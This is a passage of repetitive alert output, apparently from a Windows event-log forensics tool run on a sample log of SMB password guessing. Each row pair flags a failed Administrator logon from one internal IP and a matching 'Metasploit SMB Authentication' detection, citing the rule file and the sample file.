18302016-09-20 01:50:22.677 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 3CD0HUCdg4UWOiji : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18312016-09-20 01:50:22.677 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18322016-09-20 01:50:22.709 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: dkeWmTE1R1rYaYP8 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18332016-09-20 01:50:22.709 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18342016-09-20 01:50:22.744 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: W87qcfSj4qWWUv4k : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18352016-09-20 01:50:22.744 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18362016-09-20 01:50:22.830 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: WUCyUQgbUqwaLj3J : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18372016-09-20 01:50:22.830 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18382016-09-20 01:50:22.877 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Q9nLhDbcvmVBZp4f : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18392016-09-20 01:50:22.877 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18402016-09-20 01:50:22.925 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: BBWo1zDdjaAeGDWW : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18412016-09-20 01:50:22.925 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18422016-09-20 01:50:22.960 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: vjHRFk2flmzzd1zg : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18432016-09-20 01:50:22.960 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18442016-09-20 01:50:23.000 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 53HYxs9s7fpP1y6V : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18452016-09-20 01:50:23.000 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18462016-09-20 01:50:23.035 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: tluqXKvVooP7VNyB : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18472016-09-20 01:50:23.035 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18482016-09-20 01:50:23.076 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 43m0nfi5tiv4TpSB : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18492016-09-20 01:50:23.076 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18502016-09-20 01:50:23.107 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: qjPyJXl984vViV6L : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18512016-09-20 01:50:23.107 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18522016-09-20 01:50:23.143 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: MomQ8Yt51VsMiO4p : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18532016-09-20 01:50:23.143 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18542016-09-20 01:50:23.175 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: LJYCi5r2otMHxA8f : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18552016-09-20 01:50:23.175 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18562016-09-20 01:50:23.211 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 4oUSkMBI8SGDLwYC : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18572016-09-20 01:50:23.211 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18582016-09-20 01:50:23.251 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: j1x3lyRjxn73KITB : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18592016-09-20 01:50:23.251 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18602016-09-20 01:50:23.283 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: gh05BhGpwq1ho62a : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18612016-09-20 01:50:23.283 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18622016-09-20 01:50:23.324 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: bxj6ITbiciyRNLbF : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18632016-09-20 01:50:23.324 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18642016-09-20 01:50:23.370 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Uev2mjCaqHjm6NYi : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18652016-09-20 01:50:23.370 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18662016-09-20 01:50:23.415 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: L4WU383o9E5JyM5V : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18672016-09-20 01:50:23.415 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18682016-09-20 01:50:23.450 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: lfMv0lsoiRnTCFXe : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18692016-09-20 01:50:23.450 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18702016-09-20 01:50:23.504 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: XL4ahBqUyGeTONkE : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18712016-09-20 01:50:23.504 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18722016-09-20 01:50:23.549 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 8hJ888Kmyi6KqIPn : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18732016-09-20 01:50:23.549 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18742016-09-20 01:50:23.596 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: VZ6sfYMHuygnMdY2 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18752016-09-20 01:50:23.596 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18762016-09-20 01:50:23.636 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: XkuSlyTNc5OOoUtd : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18772016-09-20 01:50:23.636 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18782016-09-20 01:50:23.676 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 5Z13YmupcMato8Sd : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18792016-09-20 01:50:23.676 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18802016-09-20 01:50:23.733 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: JedeMnLPnRJEwhZ9 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18812016-09-20 01:50:23.733 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18822016-09-20 01:50:23.810 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: mmy0c0wFheIRzSo4 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18832016-09-20 01:50:23.810 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18842016-09-20 01:50:23.920 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: sskKdqku5S0f1sWm : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18852016-09-20 01:50:23.920 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18862016-09-20 01:50:23.962 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 15Qg0nCXNj7Ub1Sj : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18872016-09-20 01:50:23.962 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18882016-09-20 01:50:24.004 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ZD6iuaqv70k69G87 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18892016-09-20 01:50:24.004 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18902016-09-20 01:50:24.051 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: gk3UuqTJmvH1snmN : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18912016-09-20 01:50:24.051 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18922016-09-20 01:50:24.092 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: zaw9iF5mJlyygdnB : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18932016-09-20 01:50:24.092 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18942016-09-20 01:50:24.128 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Sr5PZAd1qMc7hi3c : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18952016-09-20 01:50:24.128 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18962016-09-20 01:50:24.167 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: l5xbQtyueVq3fJSG : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18972016-09-20 01:50:24.167 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18982016-09-20 01:50:24.203 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: g2nP0zz2ofBxTGw6 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
18992016-09-20 01:50:24.203 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19002016-09-20 01:50:24.237 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: SYJheREJmEwj0791 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19012016-09-20 01:50:24.237 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19022016-09-20 01:50:24.277 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: exglD9fnLwaqwRZn : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19032016-09-20 01:50:24.277 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19042016-09-20 01:50:24.325 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 8bSAU1QjasDAsmry : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19052016-09-20 01:50:24.325 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19062016-09-20 01:50:24.363 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: cfnrtXR7evQBbaOw : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19072016-09-20 01:50:24.363 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19082016-09-20 01:50:24.410 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: KYAwjW99chcntPsQ : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19092016-09-20 01:50:24.410 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19102016-09-20 01:50:24.464 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: rG2PYfOTfT7QvbPu : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19112016-09-20 01:50:24.464 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19122016-09-20 01:50:24.508 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: FojDtfDNXq0gQfYu : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19132016-09-20 01:50:24.508 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19142016-09-20 01:50:24.549 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: SUTT0QycbFtyJfNL : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19152016-09-20 01:50:24.549 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19162016-09-20 01:50:24.596 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: gcbv1lrcYdT9Wuli : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19172016-09-20 01:50:24.596 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19182016-09-20 01:50:24.636 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: pjdFfvCCfGXo7FUf : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19192016-09-20 01:50:24.636 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19202016-09-20 01:50:24.697 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: rzqGdWlGglLQx6Z4 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19212016-09-20 01:50:24.697 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19222016-09-20 01:50:24.749 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: V3Rt80PMk70sVqbk : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19232016-09-20 01:50:24.749 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19242016-09-20 01:50:24.795 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: okunzcEHnxUml4SG : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19252016-09-20 01:50:24.795 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
